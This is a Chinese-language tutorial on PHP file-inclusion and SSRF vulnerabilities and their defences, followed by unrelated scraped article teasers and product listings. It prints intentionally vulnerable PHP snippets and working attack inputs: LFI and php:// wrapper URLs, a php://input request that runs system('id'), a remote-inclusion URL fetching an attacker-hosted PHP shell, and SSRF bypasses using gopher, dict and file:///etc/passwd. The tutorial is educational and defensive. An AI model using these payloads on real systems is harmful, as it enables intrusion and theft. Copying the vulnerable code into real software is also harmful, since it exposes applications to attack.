深入理解PHP安全漏洞:文件包含與SSRF攻擊全解析

深入理解PHP安全漏洞:文件包含與SSRF攻擊全解析

前言

在Web安全領域,PHP應用程序的安全問題一直備受關注。本文將深入探討兩種常見的PHP安全漏洞:文件包含漏洞和服務器端請求偽造(SSRF),幫助開發者理解漏洞原理、利用方式以及防御措施。

第一部分:文件包含漏洞詳解

什么是文件包含漏洞?

文件包含漏洞是PHP應用程序中常見的安全問題,當開發者使用包含函數引入文件時,如果傳入的文件名參數未經嚴格校驗,攻擊者就可能利用這個漏洞讀取敏感文件甚至執行惡意代碼。

危險函數

PHP中有四個主要的文件包含函數:

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞類型

1. 本地文件包含(LFI)

利用方式:

  • 直接讀取Flag文件
  • 通過PHP偽協議讀取源代碼
  • 寫入PHP木馬獲取webshell

示例代碼:

<?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {include '/home/www/'.$file.'.php';
} else {include '/home/www/'.'home.php';
}
?>

利用方法:

http://www.example.com/demo1.php?file=flag.php%00
2. PHP偽協議利用

常用偽協議:

  1. file:// 協議:
http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt
  1. php://filter
http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
  1. php://input
POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>
3. 遠程文件包含(RFI)

必要條件:

  • allow_url_fopen = On
  • allow_url_include = On

示例代碼:

<?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>

利用方法:

http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?

防御措施

  1. 白名單驗證
  2. 禁用危險配置:
    allow_url_fopen = Off
    allow_url_include = Off
    
  3. 設置open_basedir
  4. 嚴格校驗用戶輸入
  5. 避免動態包含

第二部分:SSRF漏洞深入解析

什么是SSRF?

SSRF(Server-Side Request Forgery)是一種由攻擊者構造形成由服務端發起請求的安全漏洞。攻擊者可以利用此漏洞訪問外網無法訪問的內部系統。

常見危險函數

  1. file_get_contents()
<?php
if (isset($_POST['url'])) {$content = file_get_contents($_POST['url']);$filename = '/images/'.rand().'img1.jpg';file_put_contents($filename, $content);echo $_POST['url'];$img = "<img src=\"".$filename."\"/>";echo $img;
}
?>
  1. fsockopen()
<?php
function GetFile($host, $port, $link) {$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if (!$fp) {echo "$errstr (error number $errno) \n";} else {$out = "GET $link HTTP/1.1\r\n";$out .= "Host: $host\r\n";$out .= "Connection: Close\r\n\r\n";$out .= "\r\n";fwrite($fp, $out);$contents = '';while (!feof($fp)) {$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}
}
?>
  1. curl_exec()
<?php
if (isset($_POST['url'])) {$link = $_POST['url'];$curlobj = curl_init();curl_setopt($curlobj, CURLOPT_POST, 0);curl_setopt($curlobj, CURLOPT_URL,$link);curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($curlobj);curl_close($curlobj);$filename = './curled/'.rand().'.txt';file_put_contents($filename, $result);echo $result;
}
?>

SSRF繞過技巧

1. IP編碼繞過
  • 使用xip.io域名:
    10.0.0.1.xip.io
    
  • IP轉換為10進制
2. 協議變換
  • Dict協議:
    dict://192.168.1.1:8080/test:dict
    
  • Gopher協議:
    gopher://192.168.1.1/gopher
    
  • File協議:
    file:///etc/passwd
    
3. Gopher協議高級利用

Gopher協議可以攻擊內網的多種服務:

  • FTP
  • Telnet
  • Redis
  • Memcache

Redis攻擊示例:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>
4. filter_var()繞過
<?php
$url = $_GET['url'];
echo "Argument: ".$url. "\n";
if(filter_var($url, FILTER_VALIDATE_URL)) {$r = parse_url($url);var_dump($r);if (preg_match('/skysec\.top$/', $r['host'])) {exec("curl -v -s ".$r['host']."", $a);} else {echo "Error: Host not allowed";}
} else {echo "Error: Invalid URL";
}
?>

繞過方法:

http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/
5. 30x跳轉繞過
<?php
$url = $_GET['url'];
print $url;
curl($url);
function curl($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_exec($ch);curl_close($ch);
}

防御SSRF的最佳實踐

  1. 限制協議:只允許HTTP和HTTPS
  2. 禁止訪問內網IP
  3. 設置URL白名單
  4. 禁用CURLOPT_FOLLOWLOCATION
  5. 使用DNS解析結果校驗
  6. 過濾返回信息

結語

文件包含和SSRF漏洞都可能對Web應用造成嚴重威脅。作為開發者,理解這些漏洞的原理和利用方式,才能更好地防御它們。安全是一個持續的過程,需要開發者保持警惕并不斷更新知識。

免責聲明:本文所有技術內容僅用于教育目的和安全研究,未經授權對他人系統進行測試屬于違法行為。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/83905.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/83905.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/83905.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

MS358A 低功耗運算放大器 車規

MS358A 低功耗運算放大器 車規 產品簡述 MS358A 是雙通道運算放大器&#xff0c;具有低功耗、寬電源電壓范圍、高單位增益帶寬的特性。在特定情況下&#xff0c;壓擺率可以達到0.4V/μs 。每個通道的靜態電流 (5V) 只有 430μA 。 MS358A輸入共模范圍可以到地&#xff0c;同時…

n8n + AI Agent:AI 自動化生成測試用例并支持導出 Excel

n8n + AI Agent:AI 自動化生成測試用例并支持導出 Excel 最終成果展示一、準備工作二、手把手搭建工作流第一步:創建手動觸發器 (Chat Trigger)第二步:創建 AI Agent 節點第三步:為 AI Agent 植入 DeepSeek AI 模型第四步:解析AI的響應 (Code)第五步:生成Excel文件 (Conv…

5.1 HarmonyOS NEXT系統級性能調優:內核調度、I/O優化與多線程管理實戰

HarmonyOS NEXT系統級性能調優&#xff1a;內核調度、I/O優化與多線程管理實戰 在HarmonyOS NEXT的全場景生態中&#xff0c;系統級性能調優是構建流暢、高效應用的關鍵。通過內核調度精細化控制、存儲與網絡I/O深度優化&#xff0c;以及多線程資源智能管理&#xff0c;開發者…

?線性注意力 vs. 傳統注意力:效率與表達的博弈新解

?核心結論?&#xff1a;線性注意力用計算復雜度降維換取全局建模能力&#xff0c;通過核函數和結構優化補足表達缺陷 一、本質差異&#xff1a;兩種注意力如何工作&#xff1f; ?特性?傳統注意力&#xff08;Softmax Attention&#xff09;線性注意力&#xff08;Linear At…

github中main與master,master無法合并到main

文章目錄 遇到問題背景怎么做 遇到問題 上傳 github 時候&#xff0c;發現傳上去的是 master&#xff0c;但是 github 竟然還有一個 main 背景 github 采用 main 替代 master 作為主分支不是出于技術背景&#xff0c;而是出于 2020 年全球范圍內興起的 “Black Lives Matter…

使用矩陣乘法+線段樹解決區間歷史和問題的一種通用解法

文章目錄 前言P8868 [NOIP2022] 比賽CF1824DP9990/2020 ICPC EcFinal G 前言 一般解決普通的區間歷史和&#xff0c;只需要定義輔助 c h s ? t ? a chs-t\cdot a chs?t?a&#xff0c; h s hs hs是歷史和&#xff0c; a a a是區間和&#xff0c; t t t是時間戳&#xff0c…

RabbitMQ入門4.1.0版本(基于java、SpringBoot操作)

RabbitMQ 一、RabbitMQ概述 RabbitMQ RabbitMQ最初由LShift和CohesiveFT于2007年開發&#xff0c;后來由Pivotal Software Inc.&#xff08;現為VMware子公司&#xff09;接管。RabbitMQ 是一個開源的消息代理和隊列服務器&#xff0c;用 Erlang 語言編寫。廣泛應用于各種分布…

Python Copilot【代碼輔助工具】 簡介

粉絲愛買鱈魚腸深海鱈魚肉魚肉香腸盼盼麥香雞味塊卡樂比&#xff08;Calbee&#xff09;薯條三兄弟 獨立小包美麗雅 奶茶杯一次性飲料杯好時kisses多口味巧克力糖老金磨方【黑金系列】黑芝麻丸鄭新初網紅鄭新初烤鮮牛肉干超人毛球修剪器去球器剃毛器衣服去毛器優惠券寧之春 紅黑…

VBA進度條ProgressForm1

上一章《VBA如何使用ProgressBar進度條控件》介紹了ProgressBar控件的使用方法&#xff0c;今天我給大家介紹ProgressForm1進度條的使用方法&#xff0c;ProgressForm1是集成ProgressBar控件和Label控件的窗體&#xff0c;可以同時顯示進度條和百分比&#xff0c;如下圖&#x…

快速部署和啟動Vue3項目

快速入門Vue3 一、安裝 Node.js 和 npm Vue 3 是基于 JavaScript 的框架&#xff0c;Node.js 提供了 JavaScript 運行環境&#xff0c;npm 是 Node.js 的包管理工具&#xff0c;用于安裝和管理 Vue 3 及相關依賴。訪問 Node.js 官方網站&#xff08;https://nodejs.org/&…

[TIP] Ubuntu 22.04 配置多個版本的 GCC 環境

問題背景 在 Ubuntu 22.04 中安裝 VMware 虛擬機時&#xff0c;提示缺少 VMMON 和 VMNET 模塊 編譯這兩個模塊需要 GCC 的版本大于 12.3.0&#xff0c;而 Ubuntu 22.04 自帶的 GCC 版本為 11.4.0 因此需要安裝對應的 GCC 版本&#xff0c;但為了不影響其他程序&#xff0c;需…

【西門子杯工業嵌入式-4-什么是外部中斷】

西門子杯工業嵌入式-4-什么是外部中斷 一、中斷的基本概念1. 什么是中斷2. 生活中的中斷示例3. MCU 中的中斷機制 二、NVIC 嵌套向量中斷控制器1. NVIC 簡介2. NVIC 的作用3. 中斷向量表 三、中斷優先級機制1. 中斷優先級的含義2. 搶占與響應優先級3. 優先級分組配置 四、外部中…

Blocked aria-hidden on an element because its descendant retained focus.

問題出在 Element UI 的 el-table 組件 全選功能上&#xff0c;這是一個常見的無障礙&#xff08;a11y&#xff09;問題。這個錯誤提示與網頁 accessibility&#xff08;無障礙訪問&#xff09;相關&#xff0c;涉及 aria-hidden 屬性的不當使用。 問題原因分析 1. Element U…

App/uni-app 離線本地存儲方案有哪些?最推薦的是哪種方案?

以下是 UniApp 離線本地存儲方案的詳細介紹及推薦方案分析&#xff1a; 一、UniApp 離線本地存儲方案分類 1. 基于 uni.storage 系列 API&#xff08;跨端基礎方案&#xff09; API 及特點&#xff1a; 提供 uni.setStorage&#xff08;異步存儲&#xff09;、uni.getStorag…

數據庫系統概論(十七)超詳細講解數據庫規范化與五大范式(從函數依賴到多值依賴,再到五大范式,附帶例題,表格,知識圖譜對比帶你一步步掌握)

數據庫系統概論&#xff08;十七&#xff09;超詳細講解數據庫規范化與五大范式&#xff08;從函數依賴到多值依賴&#xff0c;再到五大范式&#xff0c;附帶例題&#xff0c;表格&#xff0c;知識圖譜對比帶你一步步掌握&#xff09; 前言一、為什么需要規范化1. 我們先想一個…

交互標牌——視覺貨幣(數字)轉換器項目及源碼

一、作品簡介 視覺貨幣&#xff08;數字&#xff09;轉換器是我為交互標牌創客爭霸賽設計的項目&#xff0c;項目的主要功能是能將所見的數字按照設定的公式轉換成新的單位量&#xff0c;這里我主要演示的是貨幣轉換&#xff0c;直接將攝像頭對準價簽&#xff0c;即可顯示出轉換…

React 第五十四節 Router中useRevalidator的使用詳解及案例分析

前言 useRevalidator 是 React Router v6.4 引入的一個強大鉤子&#xff0c;用于在數據路由&#xff08;Data Router&#xff09;中手動觸發路由數據的重新驗證&#xff08;revalidation&#xff09;。 它在需要主動刷新數據而不改變路由位置的場景中非常有用。 一、useReval…

“一代更比一代強”:現代 RAG 架構的演進之路

編者按&#xff1a; 我們今天為大家帶來的文章&#xff0c;作者的觀點是&#xff1a;RAG 技術的演進是一個從簡單到復雜、從 Naive 到 Agentic 的系統性優化過程&#xff0c;每一次優化都是在試圖解決無數企業落地大語言模型應用時出現的痛點問題。 文章首先剖析 Naive RAG 的基…

Flask-SQLAlchemy使用小結

鏈表查詢 join方法允許你指定兩個或多個表之間的連接條件&#xff0c;并返回一個新的查詢對象&#xff0c;該對象包含了連接后的結果。 內連接 from sqlalchemy import join # 使用join函數 query db.session.query(User, Order).join(Order, User.id Order.user_id) res…

【python與生活】如何構建一個解讀IPO招股書的算法?

構建一個基于Python的IPO招股書解讀算法需要結合自然語言處理&#xff08;NLP&#xff09;技術和大型語言模型&#xff08;LLM&#xff09;。以下是一個完整的解決方案&#xff0c;使用LangChain框架和OpenAI的GPT模型&#xff1a; import os import re import pandas as pd f…